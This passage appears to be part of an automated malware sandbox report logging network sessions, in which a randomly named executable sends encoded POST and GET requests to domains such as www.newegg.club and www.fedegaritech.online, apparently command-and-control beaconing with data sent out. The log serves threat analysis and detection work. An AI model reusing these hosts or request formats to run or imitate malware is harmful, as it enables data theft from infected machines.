                                                                                                      Data Ascii: 3Vh=22IXvGDfL+3zok2pKIEu0Uyb79ezEmJonEDrbsEAXk5Bkpm6zsUeE7bYG8j96PObba4ntsf7zDxf7DZNi6rwVc3LhPVy3SDfgKBaQxs4oat5UqKOCQ0n5MBA5FpX5cTdaplK64jXMROQ9xCUuVySsxAtrZSwyfl99wlb0Tg46auNziyGL0t2u0PhENc1vAsuX0aLQro8eP9nIkdVTICVeTop9L4S7Blw9DZio1oCy5iKbxyMhXknNJlVOSqihCFVHYc2VWPohZaIt9IQcoBHFEHMw6fIBZSyX8Ufg1y9R7X2GwxOZ83UP44+1nbR+CzJAQTGp+eHfn0+n1cIi/Qc/da2at9mAFP3GtK4LEAIkoygT+2ieete4tVp4QkDpIU3S0fRYEFtJd0JqaMB4x6+VvoNgOB0q5nIIbqHQ6Xveiy/QtSmFTnhJo+4cXeoH49jzfytyAJlUqeylirRfmFzr7dtKe7rOdMylG6kc8EJoYDga3Vm1cDWiauQpg1m8UsUBnpCZbd87wNXPFozFLsg3pjLls5gFwVJfUNsW5VkzVyhn2oCFyN6gWB34S8m0AYCA0gOBWGxKpSU/phrvCNtzYj5XMlmyvJH8tPQWTFVFat3REwQrfIbNdmrSVgUhcX+mgppk5RfAYbjxtXuw9SC9wUdjr/UsOnIbkBj/UMNJnrGv6sVacetByxbOIrXhRTgOEUDv0Ic50J6OLROtV5+M7TEjHSHIk7b2UvMiIocVzF/7ExYgI6evJ82uwclks4MV2aySYYZ5jEyIxtha1IF2ayx69bP5BvkT2sXtEEpjjxFdI2KDmYBhcO4d6yUoYmLo30zQ7zlr+lCByALiW8cDgqnpVrERbUA7ZOiIekKdhOtkNyTJErPsYkM3+jT/Tt9yzpxsGewsxMfeA88OtDpGBQgDLftpZMt4DPZ/9qamyC6IG/6y6QifSYRMu/d65tzzWlZhIePtG+ZSl5Re8ZizmeOpqvjG1f+So/zPljTH+4MgDfn [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49986 | 208.91.197.27 | 80 | 1896 | C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 13:54:18.240345001 CET | 492 | OUT | GET /sxrn/?3Vh=70g3synrMt+mv3bMA5M2pxuaxfXYXBcuz2rDMeB4YhlIhpmz1+c2ZYK3A+er04ehZbUUhJrT7mt7qDpgqvLlNMW5io5Y2wz+3pIWYjAXlaRVZqa6aRI+hdIryUt+yvXWOw==&GLvL=i6ILStp HTTP/1.1
Host: www.fedegaritech.online
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 OPR/31.0.1889.161
Nov 18, 2024 13:54:19.559350014 CET | 1236 | IN | HTTP/1.1 200 OK
Date: Mon, 18 Nov 2024 12:54:18 GMT
Server: Apache
Referrer-Policy: no-referrer-when-downgrade
Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_AlfK+yS335P+Fe8DNIB/CuGkJLw4/hlfKrh6u4sHnFKtmb0ItycNk/D+8wjO6prGoOAvakxCtpn990JzUTPBhw==
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
Connection: close
                                                                                                      Data Raw: 61 33 65 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 6c 69 76 65 72 79 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 74 61 79 69 6e 69 66 72 61 6d 65 20 3d 20 31 3b 20 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 6f 6e 74 6c 6f 61 64 69 6e 69 66 72 61 6d 65 20 3d 20 74 72 75 65 3b 20 69 66 28 [TRUNCATED]
                                                                                                      Data Ascii: a3e0<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link rel="preconnect" href="https://cdn.consentmanager.net"> <script>window.cmp_stayiniframe = 1; window.cmp_dontloadiniframe = true; if(!"gdprAppliesGlobally" in window){window.gdprApp
Nov 18, 2024 13:54:19.559485912 CET | 1236 | IN | Data Raw: 6c 69 65 73 47 6c 6f 62 61 6c 6c 79 3d 74 72 75 65 7d 69 66 28 21 28 22 63 6d 70 5f 69 64 22 20 69 6e 20 77 69 6e 64 6f 77 29 7c 7c 77 69 6e 64 6f 77 2e 63 6d 70 5f 69 64 3c 31 29 7b 77 69 6e 64 6f 77 2e 63 6d 70 5f 69 64 3d 30 7d 69 66 28 21 28
                                                                                                      Data Ascii: liesGlobally=true}if(!("cmp_id" in window)||window.cmp_id<1){window.cmp_id=0}if(!("cmp_cdid" in window)){window.cmp_cdid="21fdca2281833"}if(!("cmp_params" in window)){window.cmp_params=""}if(!("cmp_host" in window)){window.cmp_host="a.delivery
Nov 18, 2024 13:54:19.559498072 CET | 1236 | IN | Data Raw: 6e 64 6f 77 2e 63 6d 70 5f 67 65 74 73 75 70 70 6f 72 74 65 64 4c 61 6e 67 73 28 29 3b 76 61 72 20 63 3d 5b 5d 3b 76 61 72 20 66 3d 6c 6f 63 61 74 69 6f 6e 2e 68 61 73 68 3b 76 61 72 20 65 3d 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 3b 76 61
                                                                                                      Data Ascii: ndow.cmp_getsupportedLangs();var c=[];var f=location.hash;var e=location.search;var a="languages" in navigator?navigator.languages:[];if(f.indexOf("cmplang=")!=-1){c.push(f.substr(f.indexOf("cmplang=")+8,2).toUpperCase())}else{if(e.indexOf("cm
Nov 18, 2024 13:54:19.559509993 CET | 1236 | IN | Data Raw: 6e 63 74 69 6f 6e 20 78 28 69 2c 65 29 7b 76 61 72 20 77 3d 22 22 3b 69 2b 3d 22 3d 22 3b 76 61 72 20 73 3d 69 2e 6c 65 6e 67 74 68 3b 76 61 72 20 64 3d 6c 6f 63 61 74 69 6f 6e 3b 69 66 28 64 2e 68 61 73 68 2e 69 6e 64 65 78 4f 66 28 69 29 21 3d
                                                                                                      Data Ascii: nction x(i,e){var w="";i+="=";var s=i.length;var d=location;if(d.hash.indexOf(i)!=-1){w=d.hash.substr(d.hash.indexOf(i)+s,9999)}else{if(d.search.indexOf(i)!=-1){w=d.search.substr(d.search.indexOf(i)+s,9999)}else{return e}}if(w.indexOf("&")!=-1
                                                                                                      Nov 18, 2024 13:54:19.559583902 CET | 548 | IN | Data Raw: 63 75 72 72 65 6e 74 53 63 72 69 70 74 26 26 75 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 29 7b 75 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 2e 61 70 70 65 6e 64
                                                                                                      Data Ascii: currentScript&&u.currentScript.parentElement){u.currentScript.parentElement.appendChild(j)}else{if(u.body){u.body.appendChild(j)}else{var t=v("body");if(t.length==0){t=v("div")}if(t.length==0){t=v("span")}if(t.length==0){t=v("ins")}if(t.length
                                                                                                      Nov 18, 2024 13:54:19.559597015 CET | 1236 | IN | Data Raw: 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 6a 2e 73 72 63 3d 6b 2b 22 2f 2f 22 2b 68 2e 63 6d 70 5f 63 64 6e 2b 22 2f 64 65 6c 69 76 65 72 79 2f 22 2b 6d 2b 22 2f 63 6d 70 22 2b 62 2b 70 2b 22 2e 6a 73 22 3b 6a 2e
                                                                                                      Data Ascii: .createElement("script");j.src=k+"//"+h.cmp_cdn+"/delivery/"+m+"/cmp"+b+p+".js";j.type="text/javascript";j.setAttribute("data-cmp-ab","1");j.async=true;if(u.currentScript&&u.currentScript.parentElement){u.currentScript.parentElement.appendChil
                                                                                                      Nov 18, 2024 13:54:19.559607983 CET | 146 | IN | Data Raw: 62 2e 73 75 62 73 74 72 28 62 2e 69 6e 64 65 78 4f 66 28 22 3d 22 29 2b 31 2c 62 2e 6c 65 6e 67 74 68 29 7d 69 66 28 68 3d 3d 67 29 7b 66 3d 63 7d 76 61 72 20 65 3d 62 2e 69 6e 64 65 78 4f 66 28 22 3b 22 29 2b 31 3b 69 66 28 65 3d 3d 30 29 7b 65
                                                                                                      Data Ascii: b.substr(b.indexOf("=")+1,b.length)}if(h==g){f=c}var e=b.indexOf(";")+1;if(e==0){e=b.length}b=b.substring(e,b.length)}return(f)};window.cmp_stub=f
                                                                                                      Nov 18, 2024 13:54:19.567527056 CET | 1236 | IN | Data Raw: 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 61 72 67 75 6d 65 6e 74 73 3b 5f 5f 63 6d 70 2e 61 3d 5f 5f 63 6d 70 2e 61 7c 7c 5b 5d 3b 69 66 28 21 61 2e 6c 65 6e 67 74 68 29 7b 72 65 74 75 72 6e 20 5f 5f 63 6d 70 2e 61 7d 65 6c 73 65 7b 69 66
                                                                                                      Data Ascii: unction(){var a=arguments;__cmp.a=__cmp.a||[];if(!a.length){return __cmp.a}else{if(a[0]==="ping"){if(a[1]===2){a[2]({gdprApplies:gdprAppliesGlobally,cmpLoaded:false,cmpStatus:"stub",displayStatus:"hidden",apiVersion:"2.2",cmpId:31},true)}else{
                                                                                                      Nov 18, 2024 13:54:19.567548990 CET | 1236 | IN | Data Raw: 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 22 29 7b 76 61 72 20 68 3d 66 61 6c 73 65 3b 5f 5f 67 70 70 2e 65 3d 5f 5f 67 70 70 2e 65 7c 7c 5b 5d 3b 66 6f 72 28 76 61 72 20 64 3d 30 3b 64 3c 5f 5f 67 70 70 2e 65 2e 6c 65 6e 67 74 68
                                                                                                      Data Ascii: removeEventListener"){var h=false;__gpp.e=__gpp.e||[];for(var d=0;d<__gpp.e.length;d++){if(__gpp.e[d].id==e){__gpp.e[d].splice(d,1);h=true;break}}return{eventName:"listenerRemoved",listenerId:e,data:h,pingData:window.cmp_gpp_ping()}}else{if(g=
                                                                                                      Nov 18, 2024 13:54:19.567565918 CET | 1236 | IN | Data Raw: 72 65 74 75 72 6e 56 61 6c 75 65 3a 68 2c 73 75 63 63 65 73 73 3a 67 2c 63 61 6c 6c 49 64 3a 62 2e 63 61 6c 6c 49 64 7d 7d 3b 64 2e 73 6f 75 72 63 65 2e 70 6f 73 74 4d 65 73 73 61 67 65 28 61 3f 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 65 29
                                                                                                      Data Ascii: returnValue:h,success:g,callId:b.callId}};d.source.postMessage(a?JSON.stringify(e):e,"*")},b.parameter)}if(typeof(c)==="object"&&c!==null&&"__gppCall" in c){var b=c.__gppCall;window.__gpp(b.command,function(h,g){var e={__gppReturn:{returnValue
                                                                                                      Nov 18, 2024 13:54:19.567580938 CET | 1236 | IN | Data Raw: 69 73 61 62 6c 65 67 70 70 22 20 69 6e 20 77 69 6e 64 6f 77 29 7c 7c 21 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 69 73 61 62 6c 65 67 70 70 29 7b 77 69 6e 64 6f 77 2e 63 6d 70 5f 61 64 64 46 72 61 6d 65 28 22 5f 5f 67 70 70 4c 6f 63 61 74 6f 72 22 29
                                                                                                      Data Ascii: isablegpp" in window)||!window.cmp_disablegpp){window.cmp_addFrame("__gppLocator")}window.cmp_setStub("__cmp");if(!("cmp_disabletcf" in window)||!window.cmp_disabletcf){window.cmp_setStub("__tcfapi")}if(!("cmp_disableusp" in window)||!window.c


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      5 | 192.168.2.5 | 49987 | 149.115.238.44 | 80 | 1896 | C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Nov 18, 2024 13:54:25.226416111 CET | 737 | OUT | POST /z6yq/ HTTP/1.1
                                                                                                      Host: www.newegg.club
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 204
                                                                                                      Connection: close
                                                                                                      Cache-Control: no-cache
                                                                                                      Origin: http://www.newegg.club
                                                                                                      Referer: http://www.newegg.club/z6yq/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 OPR/31.0.1889.161
                                                                                                      Data Raw: 33 56 68 3d 46 4c 50 2b 63 36 32 73 47 47 37 43 69 72 47 63 42 37 6d 50 54 76 6a 52 6a 66 6d 54 4d 34 4b 37 64 6f 56 43 4f 32 2b 4d 77 6a 33 6c 76 35 48 39 59 63 5a 37 37 38 6a 6e 4a 43 37 64 41 6f 47 4b 54 2f 66 63 75 35 4c 6c 57 37 7a 63 45 6b 64 39 5a 2f 41 56 53 49 73 53 59 4e 6c 45 54 47 37 7a 76 47 51 36 47 6b 50 59 62 4c 73 34 51 65 63 55 68 41 6e 6c 59 58 39 31 48 58 2f 75 2f 42 70 6f 34 79 45 61 69 71 52 58 4e 77 4b 49 4c 67 37 62 75 66 7a 63 72 4d 76 49 76 72 56 7a 46 46 67 59 6a 6c 41 39 45 51 71 62 57 4d 41 4f 7a 58 57 6b 59 42 4c 73 77 6d 47 71 67 31 4f 59 64 34 66 63 71 74 48 62 66 79 55 3d
                                                                                                      Data Ascii: 3Vh=FLP+c62sGG7CirGcB7mPTvjRjfmTM4K7doVCO2+Mwj3lv5H9YcZ778jnJC7dAoGKT/fcu5LlW7zcEkd9Z/AVSIsSYNlETG7zvGQ6GkPYbLs4QecUhAnlYX91HX/u/Bpo4yEaiqRXNwKILg7bufzcrMvIvrVzFFgYjlA9EQqbWMAOzXWkYBLswmGqg1OYd4fcqtHbfyU=
                                                                                                      Nov 18, 2024 13:54:25.871208906 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                                                      Server: nginx
                                                                                                      Date: Mon, 18 Nov 2024 12:54:25 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 548
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      6 | 192.168.2.5 | 49988 | 149.115.238.44 | 80 | 1896 | C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Nov 18, 2024 13:54:27.766491890 CET | 757 | OUT | POST /z6yq/ HTTP/1.1
                                                                                                      Host: www.newegg.club
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 224
                                                                                                      Connection: close
                                                                                                      Cache-Control: no-cache
                                                                                                      Origin: http://www.newegg.club
                                                                                                      Referer: http://www.newegg.club/z6yq/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 OPR/31.0.1889.161
                                                                                                      Data Raw: 33 56 68 3d 46 4c 50 2b 63 36 32 73 47 47 37 43 6b 4b 32 63 44 59 4f 50 43 50 6a 53 74 2f 6d 54 61 49 4b 33 64 6f 5a 43 4f 7a 61 6d 73 46 48 6c 75 59 33 39 5a 65 78 37 34 38 6a 6e 51 79 37 53 4e 49 47 2f 54 2f 54 75 75 34 6e 6c 57 37 6e 63 45 6c 74 39 5a 4d 6f 57 54 59 73 71 52 74 6c 4b 5a 6d 37 7a 76 47 51 36 47 6e 79 51 62 4c 6b 34 51 75 4d 55 67 69 50 69 53 33 39 79 58 48 2f 75 75 52 70 73 34 79 45 34 69 75 52 39 4e 79 79 49 4c 67 72 62 75 4e 58 64 6b 4d 76 47 79 62 55 2f 55 58 70 52 6b 46 4d 71 59 78 66 36 4f 74 4d 37 37 42 6e 4f 43 6a 44 45 6a 47 71 53 77 6d 47 76 4d 49 2b 31 77 4f 58 72 42 6c 42 55 39 42 68 51 4e 2f 4a 76 47 50 39 2f 65 78 39 65 41 75 52 70
                                                                                                      Data Ascii: 3Vh=FLP+c62sGG7CkK2cDYOPCPjSt/mTaIK3doZCOzamsFHluY39Zex748jnQy7SNIG/T/Tuu4nlW7ncElt9ZMoWTYsqRtlKZm7zvGQ6GnyQbLk4QuMUgiPiS39yXH/uuRps4yE4iuR9NyyILgrbuNXdkMvGybU/UXpRkFMqYxf6OtM77BnOCjDEjGqSwmGvMI+1wOXrBlBU9BhQN/JvGP9/ex9eAuRp
                                                                                                      Nov 18, 2024 13:54:28.407143116 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                                                      Server: nginx
                                                                                                      Date: Mon, 18 Nov 2024 12:54:28 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 548
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      7 | 192.168.2.5 | 49989 | 149.115.238.44 | 80 | 1896 | C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Nov 18, 2024 13:54:30.315171957 CET | 1774 | OUT | POST /z6yq/ HTTP/1.1
                                                                                                      Host: www.newegg.club
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 1240
                                                                                                      Connection: close
                                                                                                      Cache-Control: no-cache
                                                                                                      Origin: http://www.newegg.club
                                                                                                      Referer: http://www.newegg.club/z6yq/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 OPR/31.0.1889.161
                                                                                                      Data Raw: 33 56 68 3d 46 4c 50 2b 63 36 32 73 47 47 37 43 6b 4b 32 63 44 59 4f 50 43 50 6a 53 74 2f 6d 54 61 49 4b 33 64 6f 5a 43 4f 7a 61 6d 73 47 6e 6c 76 75 6a 39 59 34 35 37 35 38 6a 6e 50 43 37 47 4e 49 47 59 54 2f 4c 71 75 35 61 59 57 35 66 63 46 44 35 39 53 5a 55 57 5a 59 73 71 63 4e 6c 4c 54 47 37 71 76 47 41 2b 47 6b 4b 51 62 4c 6b 34 51 6f 49 55 70 51 6e 69 55 33 39 31 48 58 2f 55 2f 42 70 55 34 79 63 43 69 75 64 48 4e 42 36 49 4c 42 62 62 73 2b 7a 64 37 38 76 45 78 62 56 69 55 58 31 53 6b 46 51 51 59 78 62 63 4f 71 41 37 71 6c 79 46 52 48 66 77 77 68 61 49 2b 32 43 74 62 73 69 56 33 64 37 32 4d 79 39 61 77 41 6b 35 62 61 31 69 44 74 45 36 4c 47 42 74 4a 62 56 68 78 63 2b 4f 6e 58 45 37 79 59 58 4d 2b 41 4c 69 33 42 63 42 50 55 38 76 54 32 30 6f 43 69 54 71 58 55 4a 65 47 42 4e 6b 51 46 32 69 49 41 70 39 36 49 7a 65 38 67 7a 64 74 74 6a 54 35 6c 35 72 78 5a 66 59 34 78 4a 38 71 37 56 78 34 31 77 43 51 67 39 42 6c 77 42 4d 41 57 70 77 59 61 4d 53 6f 43 39 6a 30 38 30 45 38 73 43 4d 5a 30 62 65 34 43 [TRUNCATED]
                                                                                                      Data Ascii: 3Vh=FLP+c62sGG7CkK2cDYOPCPjSt/mTaIK3doZCOzamsGnlvuj9Y45758jnPC7GNIGYT/Lqu5aYW5fcFD59SZUWZYsqcNlLTG7qvGA+GkKQbLk4QoIUpQniU391HX/U/BpU4ycCiudHNB6ILBbbs+zd78vExbViUX1SkFQQYxbcOqA7qlyFRHfwwhaI+2CtbsiV3d72My9awAk5ba1iDtE6LGBtJbVhxc+OnXE7yYXM+ALi3BcBPU8vT20oCiTqXUJeGBNkQF2iIAp96Ize8gzdttjT5l5rxZfY4xJ8q7Vx41wCQg9BlwBMAWpwYaMSoC9j080E8sCMZ0be4C [TRUNCATED]
                                                                                                      Nov 18, 2024 13:54:30.969628096 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                                                      Server: nginx
                                                                                                      Date: Mon, 18 Nov 2024 12:54:30 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 548
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      8 | 192.168.2.5 | 49990 | 149.115.238.44 | 80 | 1896 | C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
